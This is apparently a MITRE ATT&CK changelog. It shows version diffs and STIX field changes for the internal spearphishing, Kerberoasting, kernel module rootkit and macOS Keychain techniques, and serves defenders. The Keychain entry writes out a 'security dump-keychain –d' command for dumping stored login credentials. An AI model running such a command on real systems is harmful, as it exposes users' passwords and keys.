descriptionAdversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017) Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces. There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged campaign where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017) Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces. There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the campaign and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)
x_mitre_detectionNetwork intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017)Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing campaigns.(Citation: Trend Micro When Phishing Starts from the Inside 2017)
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication Log: Application Log Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication Log: Application Log Content

[T1558.003] Steal or Forge Kerberos Tickets: Kerberoasting

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may abuse a valid Kerberos ticket-granting ticket1Adversaries may abuse a valid Kerberos ticket-granting ticke
>t (TGT) or sniff network traffic to obtain a ticket-granting>t (TGT) or sniff network traffic to obtain a ticket-granting
> service (TGS) ticket that may be vulnerable to [Brute Force> service (TGS) ticket that may be vulnerable to [Brute Force
>](https://attack.mitre.org/techniques/T1110).(Citation: Empi>](https://attack.mitre.org/techniques/T1110).(Citation: Empi
>re InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking >re InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking 
>Kerberos Dec 2015)   Service principal names (SPNs) are used>Kerberos Dec 2015)   Service principal names (SPNs) are used
> to uniquely identify each instance of a Windows service. To> to uniquely identify each instance of a Windows service. To
> enable authentication, Kerberos requires that SPNs be assoc> enable authentication, Kerberos requires that SPNs be assoc
>iated with at least one service logon account (an account sp>iated with at least one service logon account (an account sp
>ecifically tasked with running a service(Citation: Microsoft>ecifically tasked with running a service(Citation: Microsoft
> Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN> Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN
>)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerbe>)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerbe
>ros Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)  Advers>ros Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)  Advers
>aries possessing a valid Kerberos ticket-granting ticket (TG>aries possessing a valid Kerberos ticket-granting ticket (TG
>T) may request one or more Kerberos ticket-granting service >T) may request one or more Kerberos ticket-granting service 
>(TGS) service tickets for any SPN from a domain controller (>(TGS) service tickets for any SPN from a domain controller (
>DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: A>DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: A
>dSecurity Cracking Kerberos Dec 2015) Portions of these tick>dSecurity Cracking Kerberos Dec 2015) Portions of these tick
>ets may be encrypted with the RC4 algorithm, meaning the Ker>ets may be encrypted with the RC4 algorithm, meaning the Ker
>beros 5 TGS-REP etype 23 hash of the service account associa>beros 5 TGS-REP etype 23 hash of the service account associa
>ted with the SPN is used as the private key and is thus vuln>ted with the SPN is used as the private key and is thus vuln
>erable to offline [Brute Force](https://attack.mitre.org/tec>erable to offline [Brute Force](https://attack.mitre.org/tec
>hniques/T1110) attacks that may expose plaintext credentials>hniques/T1110) attacks that may expose plaintext credentials
>.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation:>.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation:
> Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerber> Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerber
>oast Nov 2016)  This same attack could be executed using ser>oast Nov 2016)  This same behavior could be executed using s
>vice tickets captured from network traffic.(Citation: AdSecu>ervice tickets captured from network traffic.(Citation: AdSe
>rity Cracking Kerberos Dec 2015)  Cracked hashes may enable >curity Cracking Kerberos Dec 2015)  Cracked hashes may enabl
>[Persistence](https://attack.mitre.org/tactics/TA0003), [Pri>e [Persistence](https://attack.mitre.org/tactics/TA0003), [P
>vilege Escalation](https://attack.mitre.org/tactics/TA0004),>rivilege Escalation](https://attack.mitre.org/tactics/TA0004
> and [Lateral Movement](https://attack.mitre.org/tactics/TA0>), and [Lateral Movement](https://attack.mitre.org/tactics/T
>008) via access to [Valid Accounts](https://attack.mitre.org>A0008) via access to [Valid Accounts](https://attack.mitre.o
>/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 20>rg/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 
>14)>2014)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-10-20 19:30:10.687000+00:002022-03-08 21:52:42.405000+00:00
descriptionAdversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016) Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016) This same attack could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015) Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016) Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016) This same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015) Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)
x_mitre_version1.11.2

[T1547.006] Boot or Logon Autostart Execution: Kernel Modules and Extensions

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may modify the kernel to automatically execute pt1Adversaries may modify the kernel to automatically execute p
>rograms on system boot. Loadable Kernel Modules (LKMs) are p>rograms on system boot. Loadable Kernel Modules (LKMs) are p
>ieces of code that can be loaded and unloaded into the kerne>ieces of code that can be loaded and unloaded into the kerne
>l upon demand. They extend the functionality of the kernel w>l upon demand. They extend the functionality of the kernel w
>ithout the need to reboot the system. For example, one type >ithout the need to reboot the system. For example, one type 
>of module is the device driver, which allows the kernel to a>of module is the device driver, which allows the kernel to a
>ccess hardware connected to the system. (Citation: Linux Ker>ccess hardware connected to the system.(Citation: Linux Kern
>nel Programming)   When used maliciously, LKMs can be a type>el Programming)   When used maliciously, LKMs can be a type 
> of kernel-mode [Rootkit](https://attack.mitre.org/technique>of kernel-mode [Rootkit](https://attack.mitre.org/techniques
>s/T1014) that run with the highest operating system privileg>/T1014) that run with the highest operating system privilege
>e (Ring 0). (Citation: Linux Kernel Module Programming Guide> (Ring 0).(Citation: Linux Kernel Module Programming Guide) 
>) Common features of LKM based rootkits include: hiding itse>Common features of LKM based rootkits include: hiding itself
>lf, selective hiding of files, processes and network activit>, selective hiding of files, processes and network activity,
>y, as well as log tampering, providing authenticated backdoo> as well as log tampering, providing authenticated backdoors
>rs and enabling root access to non-privileged users. (Citati>, and enabling root access to non-privileged users.(Citation
>on: iDefense Rootkit Overview)  Kernel extensions, also call>: iDefense Rootkit Overview)  Kernel extensions, also called
>ed kext, are used for macOS to load functionality onto a sys> kext, are used in macOS to load functionality onto a system
>tem similar to LKMs for Linux. They are loaded and unloaded > similar to LKMs for Linux. Since the kernel is responsible 
>through <code>kextload</code> and <code>kextunload</code> co>for enforcing security and the kernel extensions run as apar
>mmands. Since macOS Catalina 10.15, kernel extensions have b>t of the kernel, kexts are not governed by macOS security po
>een deprecated on macOS systems.(Citation: Apple Kernel Exte>licies. Kexts are loaded and unloaded through <code>kextload
>nsion Deprecation)  Adversaries can use LKMs and kexts to co></code> and <code>kextunload</code> commands. Kexts need to 
>vertly persist on a system and elevate privileges. Examples >be signed with a developer ID that is granted privileges by 
>have been found in the wild and there are some open source p>Apple allowing it to sign Kernel extensions. Developers with
>rojects. (Citation: Volatility Phalanx2) (Citation: CrowdStr>out these privileges may still sign kexts but they will not 
>ike Linux Rootkit) (Citation: GitHub Reptile) (Citation: Git>load unless SIP is disabled. If SIP is enabled, the kext sig
>Hub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick W>nature is verified before being added to the AuxKC.(Citation
>ardle) (Citation: Synack Secure Kernel Extension Broken)(Cit>: System and kernel extensions in macOS)  Since macOS Catali
>ation: Securelist Ventir) (Citation: Trend Micro Skidmap)>na 10.15, kernel extensions have been deprecated in favor of
 > System Extensions. However, kexts are still allowed as "Leg
 >acy System Extensions" since there is no System Extension fo
 >r Kernel Programming Interfaces.(Citation: Apple Kernel Exte
 >nsion Deprecation)  Adversaries can use LKMs and kexts to co
 >nduct [Persistence](https://attack.mitre.org/tactics/TA0003)
 > and/or [Privilege Escalation](https://attack.mitre.org/tact
 >ics/TA0004) on a system. Examples have been found in the wil
 >d, and there are some relevant open source projects as well.
 >(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux 
 >Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorph
 >ine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citat
 >ion: Synack Secure Kernel Extension Broken)(Citation: Secure
 >list Ventir)(Citation: Trend Micro Skidmap)

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-19 04:03:46.357000+00:002022-04-20 18:53:39.406000+00:00
descriptionAdversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming)  When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview) Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation) Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)  When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview) Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload and kextunload commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS) Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation) Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
external_references[1]['source_name']Linux Kernel ProgrammingApple Developer Configuration Profile
external_references[1]['description']Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018.Apple. (2019, May 3). Configuration Profile Reference. Retrieved September 23, 2021.
external_references[1]['url']https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdfhttps://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
external_references[2]['source_name']Linux Kernel Module Programming GuideApple Kernel Extension Deprecation
external_references[2]['description']Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved April 6, 2018.Apple. (n.d.). Deprecated Kernel Extensions and System Extension Alternatives. Retrieved November 4, 2020.
external_references[2]['url']http://www.tldp.org/LDP/lkmpg/2.4/html/x437.htmlhttps://developer.apple.com/support/kernel-extensions/
external_references[3]['source_name']iDefense Rootkit OverviewSystem and kernel extensions in macOS
external_references[3]['description']Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved April 6, 2018.Apple. (n.d.). System and kernel extensions in macOS. Retrieved March 31, 2022.
external_references[3]['url']http://www.megasecurity.org/papers/Rootkits.pdfhttps://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
external_references[4]['source_name']Apple Kernel Extension DeprecationGitHub Reptile
external_references[4]['description']Apple. (n.d.). Deprecated Kernel Extensions and System Extension Alternatives. Retrieved November 4, 2020.Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved April 9, 2018.
external_references[4]['url']https://developer.apple.com/support/kernel-extensions/https://github.com/f0rb1dd3n/Reptile
external_references[6]['source_name']CrowdStrike Linux RootkitiDefense Rootkit Overview
external_references[6]['description']Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved April 6, 2018.
external_references[6]['url']https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/http://www.megasecurity.org/papers/Rootkits.pdf
external_references[7]['source_name']GitHub ReptileLinux Loadable Kernel Module Insert and Remove LKMs
external_references[7]['description']Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved April 9, 2018.Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018.
external_references[7]['url']https://github.com/f0rb1dd3n/Reptilehttp://tldp.org/HOWTO/Module-HOWTO/x197.html
external_references[8]['source_name']GitHub DiamorphineCrowdStrike Linux Rootkit
external_references[8]['description']Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.
external_references[8]['url']https://github.com/m0nad/Diamorphinehttps://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
external_references[9]['source_name']RSAC 2015 San Francisco Patrick WardleGitHub Diamorphine
external_references[9]['description']Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. Retrieved April 6, 2018.Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
external_references[9]['url']https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdfhttps://github.com/m0nad/Diamorphine
external_references[10]['source_name']Synack Secure Kernel Extension BrokenSecurelist Ventir
external_references[10]['description']Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel Extension Loading’ is Broken. Retrieved April 6, 2018.Mikhail, K. (2014, October 16). The Ventir Trojan: assemble your MacOS spy. Retrieved April 6, 2018.
external_references[10]['url']https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
external_references[11]['source_name']Securelist VentirUser Approved Kernel Extension Pike’s
external_references[11]['description']Mikhail, K. (2014, October 16). The Ventir Trojan: assemble your MacOS spy. Retrieved April 6, 2018.Pikeralpha. (2017, August 29). User Approved Kernel Extension Loading…. Retrieved September 23, 2021.
external_references[11]['url']https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
external_references[12]['source_name']Trend Micro SkidmapLinux Kernel Module Programming Guide
external_references[12]['description']Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020.Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved April 6, 2018.
external_references[12]['url']https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
external_references[13]['source_name']Linux Loadable Kernel Module Insert and Remove LKMsLinux Kernel Programming
external_references[13]['description']Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018.Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018.
external_references[13]['url']http://tldp.org/HOWTO/Module-HOWTO/x197.htmlhttps://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
external_references[14]['source_name']Wikipedia Loadable Kernel ModuleTrend Micro Skidmap
external_references[14]['description']Wikipedia. (2018, March 17). Loadable kernel module. Retrieved April 9, 2018.Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020.
external_references[14]['url']https://en.wikipedia.org/wiki/Loadable_kernel_module#Linuxhttps://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
external_references[15]['source_name']User Approved Kernel Extension Pike’sPurves Kextpocalypse 2
external_references[15]['description']Pikeralpha. (2017, August 29). User Approved Kernel Extension Loading…. Retrieved September 23, 2021.Richard Purves. (2017, November 9). MDM and the Kextpocalypse . Retrieved September 23, 2021.
external_references[15]['url']https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
external_references[16]['source_name']Purves Kextpocalypse 2RSAC 2015 San Francisco Patrick Wardle
external_references[16]['description']Richard Purves. (2017, November 9). MDM and the Kextpocalypse . Retrieved September 23, 2021.Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. Retrieved April 6, 2018.
external_references[16]['url']https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
external_references[17]['source_name']Apple Developer Configuration ProfileSynack Secure Kernel Extension Broken
external_references[17]['description']Apple. (2019, May 3). Configuration Profile Reference. Retrieved September 23, 2021.Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel Extension Loading’ is Broken. Retrieved April 6, 2018.
external_references[17]['url']https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdfhttps://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
x_mitre_data_sources[0]File: File ModificationProcess: Process Creation
x_mitre_data_sources[1]Command: Command ExecutionKernel: Kernel Module Load
x_mitre_data_sources[3]Kernel: Kernel Module LoadFile: File Modification
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Wikipedia Loadable Kernel Module', 'description': 'Wikipedia. (2018, March 17). Loadable kernel module. Retrieved April 9, 2018.', 'url': 'https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux'}
x_mitre_contributorsEric Kaiser @ideologysec
x_mitre_data_sourcesCommand: Command Execution

[T1555.001] Credentials from Password Stores: Keychain

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may collect the keychain storage data from a syst1Adversaries may acquire credentials from Keychain. Keychain 
>tem to acquire credentials. Keychains are the built-in way f>(or Keychain Services) is the macOS credential management sy
>or macOS to keep track of users' passwords and credentials f>stem that stores account names, passwords, private keys, cer
>or many services and features such as WiFi passwords, websit>tificates, sensitive application data, payment data, and sec
>es, secure notes, certificates, and Kerberos. Keychain files>ure notes. There are three types of Keychains: Login Keychai
> are located in <code>~/Library/Keychains/</code>,<code>/Lib>n, System Keychain, and Local Items (iCloud) Keychain. The d
>rary/Keychains/</code>, and <code>/Network/Library/Keychains>efault Keychain is the Login Keychain, which stores user pas
>/</code>. (Citation: Wikipedia keychain) The <code>security<>swords and information. The System Keychain stores items acc
>/code> command-line utility, which is built into macOS by de>essed by the operating system, such as items shared among us
>fault, provides a useful way to manage these credentials.  T>ers on a host. The Local Items (iCloud) Keychain is used for
>o manage their credentials, users have to use additional cre> items synced with Apple’s iCloud service.   Keychains can b
>dentials to access their keychain. If an adversary knows the>e viewed and edited through the Keychain Access application 
> credentials for the login keychain, then they can get acces>or using the command-line utility <code>security</code>. Key
>s to all the other credentials stored in this vault. (Citati>chain files are located in <code>~/Library/Keychains/</code>
>on: External to DA, the OS X Way) By default, the passphrase>, <code>/Library/Keychains/</code>, and <code>/Network/Libra
> for the keychain is the user’s logon credentials.>ry/Keychains/</code>.(Citation: Keychain Services Apple)(Cit
 >ation: Keychain Decryption Passware)(Citation: OSX Keychain 
 >Schaumann)  Adversaries may gather user credentials from Key
 >chain storage/memory. For example, the command <code>securit
 >y dump-keychain –d</code> will dump all Login Keychain crede
 >ntials from <code>~/Library/Keychains/login.keychain-db</cod
 >e>. Adversaries may also directly read Login Keychain creden
 >tials from the <code>~/Library/Keychains/login.keychain</cod
 >e> file. Both methods require a password, where the default 
 >password for the Login Keychain is the current user’s passwo
 >rd to login to the macOS host.(Citation: External to DA, the
 > OS X Way)(Citation: Empire Keychain Decrypt)  

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator']
values_changed
STIX FieldOld valueNew Value
modified2020-02-17 13:14:31.140000+00:002022-04-18 20:32:22.122000+00:00
descriptionAdversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials. To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service. Keychains can be viewed and edited through the Keychain Access application or using the command-line utility security. Keychain files are located in ~/Library/Keychains/, /Library/Keychains/, and /Network/Library/Keychains/.(Citation: Keychain Services Apple)(Citation: Keychain Decryption Passware)(Citation: OSX Keychain Schaumann) Adversaries may gather user credentials from Keychain storage/memory. For example, the command security dump-keychain –d will dump all Login Keychain credentials from ~/Library/Keychains/login.keychain-db. Adversaries may also directly read Login Keychain credentials from the ~/Library/Keychains/login.keychain file. Both methods require a password, where the default password for the Login Keychain is the current user’s password to login to the macOS host.(Citation: External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)
external_references[1]['source_name']Wikipedia keychainExternal to DA, the OS X Way
external_references[1]['description']Wikipedia. (n.d.). Keychain (software). Retrieved July 5, 2017.Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017.
external_references[1]['url']https://en.wikipedia.org/wiki/Keychain_(software)http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
